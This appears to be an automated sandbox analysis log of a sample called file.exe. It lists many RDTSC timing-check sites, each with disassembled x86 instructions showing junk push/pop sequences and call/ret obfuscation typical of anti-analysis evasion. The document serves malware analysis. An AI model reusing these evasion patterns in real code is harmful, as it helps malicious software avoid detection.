          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7A2BC second address: B7A32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F174075FE78h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov di, EB73h 0x0000002f adc bx, 8112h 0x00000034 push 00000000h 0x00000036 movzx ebx, di 0x00000039 push eax 0x0000003a pushad 0x0000003b jnl 00007F174075FE8Dh 0x00000041 jmp 00007F174075FE87h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F174075FE7Ah 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7B3F6 second address: B7B3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7A51C second address: B7A59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 jno 00007F174075FE83h 0x0000000f jmp 00007F174075FE7Dh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov dword ptr [ebp+122D1A31h], ebx 0x00000028 mov eax, dword ptr [ebp+122D1351h] 0x0000002e mov ebx, esi 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F174075FE78h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c jno 00007F174075FE79h 0x00000052 xor edi, dword ptr [ebp+122D1CC4h] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jp 00007F174075FE7Ch 0x00000061 jns 00007F174075FE76h 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7A59D second address: B7A5AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7D27E second address: B7D2DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and bx, EFE4h 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 add dword ptr [ebp+122D1BD7h], ebx 0x0000001a mov esi, ebx 0x0000001c popad 0x0000001d mov di, dx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F174075FE78h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c sub dword ptr [ebp+1247EA58h], ebx 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jno 00007F174075FE76h 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7D2DD second address: B7D2E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7E239 second address: B7E240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7E240 second address: B7E24E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7D420 second address: B7D424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7E24E second address: B7E25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FCh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7F260 second address: B7F264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7E3F8 second address: B7E3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7F264 second address: B7F26E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7E3FC second address: B7E40B instructions: 0x00000000 rdtsc 0x00000002 js 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7E4AF second address: B7E4B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7F3BC second address: B7F3C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B8017C second address: B80184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7F3C0 second address: B7F444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push ecx 0x0000000a mov edi, 0B842C4Ch 0x0000000f pop ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F17414E33F8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr [ebp+1247E76Dh], ecx 0x00000037 movsx ebx, cx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push ebx 0x00000044 call 00007F17414E33F8h 0x00000049 pop ebx 0x0000004a mov dword ptr [esp+04h], ebx 0x0000004e add dword ptr [esp+04h], 00000014h 0x00000056 inc ebx 0x00000057 push ebx 0x00000058 ret 0x00000059 pop ebx 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+1247ACDBh] 0x00000061 mov eax, dword ptr [ebp+122D1029h] 0x00000067 mov dword ptr [ebp+122D2756h], esi 0x0000006d push FFFFFFFFh 0x0000006f js 00007F17414E33FCh 0x00000075 jnl 00007F17414E33F6h 0x0000007b push eax 0x0000007c push ebx 0x0000007d push ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B8039B second address: B803BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F174075FE78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F174075FE83h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B803BD second address: B803D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3401h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B803D2 second address: B803D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B8ACE8 second address: B8ACF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B8AE4C second address: B8AE68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F174075FE76h 0x0000000a jmp 00007F174075FE82h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B8B13C second address: B8B161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F17414E3404h 0x0000000a pop edx 0x0000000b ja 00007F17414E3421h 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B8B161 second address: B8B174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F174075FE76h 0x0000000d jne 00007F174075FE76h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B95448 second address: B9544C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B940C0 second address: B940D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE7Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B940D4 second address: B940D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B946E7 second address: B94701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE84h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B94701 second address: B94706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B94706 second address: B9471D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F174075FE82h 0x00000008 jo 00007F174075FE76h 0x0000000e jg 00007F174075FE76h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B9471D second address: B94741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007F17414E3409h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B94D33 second address: B94D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B94D39 second address: B94D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B94E98 second address: B94EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE88h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B9802A second address: B98036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F17414E33F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B997A4 second address: B997AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B997AB second address: B997B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F17414E33FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B9AD14 second address: B9AD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F174075FE76h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B9AD1E second address: B9AD24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B9AD24 second address: B9AD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE88h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA12C5 second address: BA12D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA12D2 second address: BA131E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F174075FE76h 0x00000008 jmp 00007F174075FE88h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F174075FE87h 0x00000017 jl 00007F174075FE76h 0x0000001d jns 00007F174075FE76h 0x00000023 popad 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA131E second address: BA1324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1498 second address: BA14DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F174075FE89h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F174075FE87h 0x00000012 jmp 00007F174075FE7Dh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA14DC second address: BA14E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1646 second address: BA1680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Fh 0x00000007 jmp 00007F174075FE7Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007F174075FE87h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1680 second address: BA1685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1685 second address: BA16A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE82h 0x00000007 jp 00007F174075FE82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA16A1 second address: BA16A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA17EC second address: BA1802 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F174075FE76h 0x00000008 jns 00007F174075FE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1802 second address: BA1806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1806 second address: BA180C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA180C second address: BA1812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1812 second address: BA1823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F174075FE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA19A4 second address: BA19AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1AE1 second address: BA1AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1EF0 second address: BA1EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1EF4 second address: BA1EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA1EFA second address: BA1F1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jo 00007F17414E33F6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 jbe 00007F17414E33F6h 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA6F05 second address: BA6F15 instructions: 0x00000000 rdtsc 0x00000002 je 00007F174075FE76h 0x00000008 je 00007F174075FE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA6F15 second address: BA6F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17414E3403h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA5CE1 second address: BA5CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA5CE5 second address: BA5D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E3408h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B6FA1D second address: B6FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B6FA23 second address: B4F175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jnc 00007F17414E33F9h 0x0000000f lea eax, dword ptr [ebp+12486741h] 0x00000015 movzx edx, si 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F17414E3400h 0x00000020 jmp 00007F17414E3402h 0x00000025 popad 0x00000026 jmp 00007F17414E3400h 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007F17414E3401h 0x00000036 popad 0x00000037 ja 00007F17414E33F8h 0x0000003d popad 0x0000003e nop 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007F17414E33F8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 mov edx, dword ptr [ebp+1245E617h] 0x0000005f xor dword ptr [ebp+122D2297h], edi 0x00000065 call dword ptr [ebp+122D1EFAh] 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007F17414E3415h 0x00000073 push eax 0x00000074 push edx 0x00000075 pop edx 0x00000076 pop eax 0x00000077 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B6FB76 second address: B6FB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B6FB7A second address: B6FB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F17414E33F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B6FEFB second address: B6FF00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B6FF00 second address: B6FF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7004F second address: B70055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70055 second address: B700BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5BEDA44Fh 0x00000010 call 00007F17414E33F9h 0x00000015 push ebx 0x00000016 jmp 00007F17414E3408h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d jmp 00007F17414E33FAh 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17414E3407h 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B700BC second address: B700CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE7Bh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70269 second address: B70272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7035E second address: B70362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70362 second address: B7038B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F17414E3408h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7038B second address: B70390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70390 second address: B703BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F17414E3409h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70CBC second address: B70D0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F174075FE80h 0x0000000d nop 0x0000000e mov di, cx 0x00000011 lea eax, dword ptr [ebp+12486785h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F174075FE78h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 jmp 00007F174075FE7Ah 0x00000036 nop 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70D0A second address: B70D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70D21 second address: B70D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70D25 second address: B70D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F17414E3408h 0x0000000e pop edx 0x0000000f nop 0x00000010 sbb di, 195Eh 0x00000015 lea eax, dword ptr [ebp+12486741h] 0x0000001b mov di, F221h 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F17414E33FEh 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70D69 second address: B70D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B70D7F second address: B70D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
